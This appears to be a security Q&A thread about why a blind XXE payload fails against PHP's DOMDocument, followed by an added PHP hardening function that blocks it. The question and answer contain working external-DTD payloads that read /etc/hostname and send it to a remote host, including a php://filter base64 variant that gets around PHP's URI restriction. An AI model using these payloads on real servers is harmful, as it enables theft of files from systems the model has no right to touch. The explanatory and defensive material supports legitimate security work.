When attempting to exploit blind XXE as explained in this article, I got an error in my Apache logs:

PHP Warning: DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity

The DTD file:

<!ENTITY % payload SYSTEM "file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;

The request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE load SYSTEM "http://192.168.6.1/xxe.dtd">
<root><email>asd</email><password>asd</password></root>

Why can't I send the /etc/hostname?

1 Answer

I found out the issue is that /etc/hostname has a newline at the end. Apparently, while Java applications have no problem with this (as shown in the article), PHP does not accept newlines in URIs.

I confirmed this by creating a file which doesn't contain a newline. I was able to send it successfully.

In fact, you can use the php:// protocol to convert the file's contents to base64 and get around the restriction. Here is the updated payload:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;
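For the application side, here is how a PHP DOMDocument loader can be hardened so that neither the plain nor the php://filter variant of this DTD gets anywhere. This is an added example, not code from the question or the answer; it assumes PHP 8 with ext-dom, and the function name is my own.

```php
<?php
// Added hardening example (not code from the question or the answer).
// Assumes PHP 8.x with ext-dom/libxml; $xml is untrusted input such as the
// request body shown in the question.

function loadUntrustedXml(string $xml): DOMDocument
{
    // The technique needs <!DOCTYPE ... SYSTEM "http://..."> to pull the
    // hostile DTD, so refuse any document that declares a DOCTYPE at all.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }

    $doc = new DOMDocument();
    $doc->resolveExternals   = false; // never fetch external entities
    $doc->substituteEntities = false; // never expand entity references

    // LIBXML_NONET forbids network access while parsing, which stops both the
    // DTD fetch and the callback URL that would carry the file contents.
    // Do NOT add LIBXML_NOENT or LIBXML_DTDLOAD: those re-enable exactly the
    // behaviour the payloads above depend on.
    $previous = libxml_use_internal_errors(true);
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    // Belt and braces: even a DOCTYPE that slipped past the regex check is
    // visible on the parsed document and is grounds for rejection.
    if (!$ok || $doc->doctype !== null) {
        $msg = $errors ? trim($errors[0]->message) : 'document declares a DOCTYPE';
        throw new InvalidArgumentException('rejected XML: ' . $msg);
    }
    return $doc;
}

// Constructed inputs: the request from the question, and a harmless document.
$hostile = '<?xml version="1.0" encoding="UTF-8"?>'
         . '<!DOCTYPE load SYSTEM "http://192.168.6.1/xxe.dtd">'
         . '<root><email>asd</email><password>asd</password></root>';
$benign  = '<root><email>asd</email><password>asd</password></root>';

try {
    loadUntrustedXml($hostile);
} catch (InvalidArgumentException $e) {
    echo "blocked: ", $e->getMessage(), "\n";
}
echo loadUntrustedXml($benign)->getElementsByTagName('email')->item(0)->textContent, "\n";
```

The DOCTYPE pre-check is only defence in depth; the controls that actually matter are LIBXML_NONET plus the absence of LIBXML_NOENT and LIBXML_DTDLOAD.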